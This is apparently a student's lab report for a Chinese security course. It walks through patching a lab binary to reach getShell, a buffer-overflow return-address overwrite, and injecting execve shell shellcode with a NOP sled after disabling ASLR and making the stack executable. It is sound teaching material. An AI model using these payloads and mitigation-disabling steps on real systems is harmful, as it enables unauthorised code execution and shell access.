网络对抗实验一 逆向及Bof基础实践

网络对抗实验一 逆向及Bof基础实践

一、实验目的

本次实践的对象是一个名为pwn1的linux可执行文件。
该程序正常执行流程是：main调用foo函数,foo函数会简单回显任何用户输入的字符串。
该程序同时包含另一个代码片段，getShell，会返回一个可用Shell。正常情况下这个代码是不会被运行的。我们实践的目标就是想办法运行这个代码片段。我们将学习两种方法运行这个代码片段，然后学习如何注入运行任何Shellcode。

三个实践内容如下：

手工修改可执行文件，改变程序执行流程，直接跳转到getShell函数。
利用foo函数的Bof漏洞，构造一个攻击输入字符串，覆盖返回地址，触发getShell函数。
注入一个自己制作的shellcode并运行这段shellcode。
这几种思路，基本代表现实情况中的攻击目标:
运行原本不可访问的代码片段
强行修改程序执行流
以及注入运行任意代码。

二、准备工作

平台准备
Linux-Kali（最好是虚拟机）
一个准备好的实验文档（ExpCode）
一个聪明且……有耐心的人
知识储备
一点Linux指令（实在不想学也可以一点一点跟着敲啦，还有不会的可以找度娘O(∩_∩)O）
一点汇编语言知识
一点缓冲区溢出的原理知识

准备好了，我们来开始吧

三、实验操作

让我们边做边说

1 学会怎么反汇编

将实验用文件（本次试验名称为ExpCode1）放在/Home/Experiment1文件夹下，将用户名改为ZhaoWenhao。
这里需要用到Linux指令（-d 英文全称是disassembling，含义是反汇编）：

~# objdump -d （这里敲入文件名）

敲击回车，Terminal会将该文件的所有汇编指令显示出来。

指令执行结束后的效果如下图所示，由于汇编指令通常会很长，这里考虑到篇幅有限，仅向读者呈现我们会使用到的三个函数：main、foo和getShell。

这里我们可以看到机器码16进制对应的汇编指令，和程序在运行时每条指令所在的内存地址。这里可以看到，main函数第4行（内存地址80484b5）跳转到了foo函数（内存地址8048491），和接下来的实验中用到的getShell函数的内存地址为804847d。机器指令e8即为跳转之意，后面的数值d7ffffff是补码，表示-41=0x29。经过计算，80484ba +d7ffffff= 80484ba-0x29正好是8048491这个值。

2 修改机器指令

对可执行文件进行修改，令其在main函数中第4条指令跳转到getShell函数，而不是foo函数。
只要我们修改可执行文件“d7ffffff”为，"getShell-80484ba"对应的补码就行，是c3ffffff。
对应操作为：
复制一份可执行文件，命名为ExpCode2，以便在实验出错的时候还原备份，对应Linux命令为：++cp ExpCode1 ExpCode2++
接下来打开其中一份文件进行修改，对应Linux命令为：++vi ExpCode1++

敲击回车后，效果如下：

我们发现这份文件中内容很乱，为了方便我们定位程序位置，我们最好使用十六进制查看文件内容，在这里我们可以按一下Esc键，在当前状态下允许用户输入命令。接下来我们可以输入命令将显示模式切换为16进制：++:%!xxd++。

逐行查找对于我们来说难度还太大，所以我们可以借助命令行来帮助我们查找：++/e8d7++

没有查到我们想要的字段，问题可能是因为这两个8bit十六进制数间被空格符隔开了。所以我们接下来可以查找：++/e8 d7++

终端上高亮显示的部分就表示了我们查找的字段所在位置，在它前后检查可以确认这就是我们想要修改的汇编命令字段，接下来我们只需要根据上一阶段的计算结果将d7改为c3，即可将程序改为跳转到另一个函数。修改时，将光标移到需要修改的16进制数上，敲击r键，再敲击想要修改的键，即可完成对该字符的修改。修改完毕后，需要转换16进制为原格式，命令为：++:%!xxd -r++，再存盘退出命令为：++:wq++。（如果不转换为原格式，会导致该文件不可执行，一定要记得改回原样并保存ヽ(￣▽￣)ﾉ）

现在让我们对比一下，修改前的文件ExpCode2和修改后的文件ExpCode1。

没有修改过的程序执行后，会出现Shell提示符，敲入命令是可以执行的，无效指令会被提示出现错误。没有修改过的程序，是会重复显示我们输入的字符串（敲击回车结束），这就反映了程序调用函数的不同，也验证了我们以上的操作是成功的，有效更改了函数调用。为了证明这一点，我们同样反汇编修改过得可执行文件。

不难发现，程序中main函数第4个命令，所调用的函数变成了getShell。

3 通过构造函数，行程BOF攻击，改变程序执行流

再创建一个程序备份，以便在发生错误的时候恢复文件。这个阶段使用ExpCode2来进行操作。
同样先对可执行文件进行反汇编操作，我们的目标同样是要更改函数调用，触发getShell函数以达成我们的目标。

我们本次操作是针对foo函数，由于读入字符串的字符数量没有限制，系统也没有边界检测以防止缓冲区溢出，所以超出缓冲区的字符串就会影响程序的返回地址，如果超出的字符串是我们预先设计好的，那么被覆盖掉的返回地址就可以是我们指定的，不受原本程序控制的一个函数，最终造成程序返回出错。
缓冲区溢出攻击就是利用了系统不设置边界检测这一漏洞实现的，原本预留出的空间不够使用，则对这块区域的输入数据会一直向下保存下去，这样会覆盖掉原来有意义的指令，变成一些对我们没有意义的其它指令，但如果这些溢出的数据是我们精心设计好的，覆盖在一些非常关键的地方比如跳转到另外一个函数，程序就出现其他效果了，由入侵者掌握电脑的这个程序了。
让我们先来试试这个程序，确认输入多少字符串后会覆盖到程序的返回地址。我们先输入一个比较长的字符串，看看程序会不会执行出错。
这个时候需要用到调试功能：

在调试过程中，我们给这个程序输入了一个48B的字符串，程序如预想的情况那样出错了，在我们使用info r命令查看当前寄存器状态中，发现EIP寄存器（用于存放下一条指令的内存地址的寄存器）被0x35353535的字段覆盖掉了，这就表示了当前返回地址是四个‘5’。
再进行进一步尝试，将5替换成其它字段已确定是哪个位置的字符会覆盖EIP寄存器。

最终得到字符1234所处的位置会覆盖EIP寄存器，我们应该设计这四个字符以符合要求地改写程序（寄存器显示时是按照16进制从高位向低位显示，事实上我们的阅读和书写习惯则是从低位向高位，所以需要从右向左每两字为单位阅读）。接下来的操作会使这块区域变成我们需要的内容（\x7d\x84\x04\x08）。
查阅ASCII码表，要改写的字符串\x7d\x84\x04\x08里面有无法从键盘读入的字符，这时候需要借助Perl语言来代替我们生成这样符合要求的字符串：

~# perl -e 'print "11111111222222223333333344444444\x7d\x84\x04\x08\x0a"' > input

重定向输出到input文件中，\x0a表示回车，如果没有的话，在程序运行时就需要手工按一下回车键。

不难发现，程序就像ExpCode1文件一样可以执行我们的命令，当然，如果不使用input文件输入，也可以使用这条代码，起到一样的作用：

~# (perl -e 'print "11111111222222223333333344444444\x7d\x84\x04\x08\x0a"';cat) | ./pwn1

4 注入Shellcode并执行

我们准备好了这样一段

Shellcode：\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\

考虑到我们的buf缓存区域足够，我们这次采用结构是：nops+shellcode+retaddr。我们猜测的返回地址只要落在任何一个nop上，就会自然运行到shellcode命令，不会在中途跳转到其它函数或命令上。
接下来我们输入一段命令：

~# perl -e 'print "\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x4\x3\x2\x1\x00"' > input_shellcode

用与上文类似的方法构造一个字符串，写入到input_shellcode文件中用作文件执行时的输入。在这段字符串中，末尾的\x4\x3\x2\x1会覆盖到堆栈上的返回地址，这段会在后面改为shellcode的地址。最后一个字符不要设置成\x0a，否则会影响接下来的操作。
接下来确定\x4\x3\x2\x1这段到底该填什么，接着在终端中注入这样一段攻击buf：

~ (cat input_shellcode;cat) | ./ExpCode2

这条指令输入完毕后按一次回车就不要再进行操作了，否则进程会结束，接下来的追踪进程将无法进行。
这个时候我们打开另一个终端，用gdb调试:

输入一系列命令，通过系统报告可以看出，原终端上（小窗口）的进程号为2064，所以就追踪这个进程，在其中设置断点（0x080484ae）。
这个时候在原终端再按一下回车，回到大窗口，继续调试进程，看到命令被输入在了进程之中，查询ESP（存放栈顶地址的寄存器）寄存器并检视这一区域数据的内容。

我们发现\x4\x3\x2\x1果然出现在栈顶，再往后一点就是我们所需要的地址了！细心一点，数到第一个f7，得到内存地址为0xffea8230，这就是我们需要更改的地址了。
退出gdb编译，现在来修改输入时所用的字符串。

像上文一样启用这个文件，发现：段错误

看来仅仅这样还是不能达到目标……
再做一次？结果还是不行……
又试了几次结果发现每次的进程分配内存都会不一样，这需要我们关闭地址随机化：

~# execstack -s pwn1 //设置堆栈可执行
~# execstack -q pwn1 //查询文件的堆栈是否可执行
X pwn1
~# more /proc/sys/kernel/randomize_va_space
2
~# echo "0" > /proc/sys/kernel/randomize_va_space //关闭地址随机化
~# more /proc/sys/kernel/randomize_va_space
0

又试了几次（推荐大家别再试了，这个真的很累很烦躁 o(TωT)o ）内存地址每次都是保持不变的，好了，重新开始！
经过与上文同样的内容，再次修改我们的输入，这样就成功了！

四、感想

做的时候跳坑了……很久都没有反应过来，不过这些都不要紧！
实验对于一个新手来说还是比较复杂的，不过这样的实验也的确是提升自我实力的最好的办法。
跟着老师上课讲的步骤一步一步做下来其实不是很难，但更关键的是要掌握实验原理，这样会比较好理解，也不需要死记硬背一些看似很头疼的指令，下面就说说我遇到的问题吧。
由于老师恩赐的Linux—Kali虚拟机是64位系统，所以一开始还不能运行实验准备的32位程序，因为修这个还搞炸了老师恩赐的虚拟机，所以后面又从官网上下载了一个很新很新的版本，如果有人也有同样的问题，点击这个链接哦~
还有就是在设置堆栈可执行的时候，Linux可能会报错：execstack找不到命令，这样只需要我们安装一下apt-get install execstack即可（这个东西度娘不肯告诉我，感谢机智的同学！）
总而言之，这次试验还是自己一点一点啃下来了，虽然中间去补学了很多Linux的东西，但是非常有成就感！
文章中如有不对还望批评指正~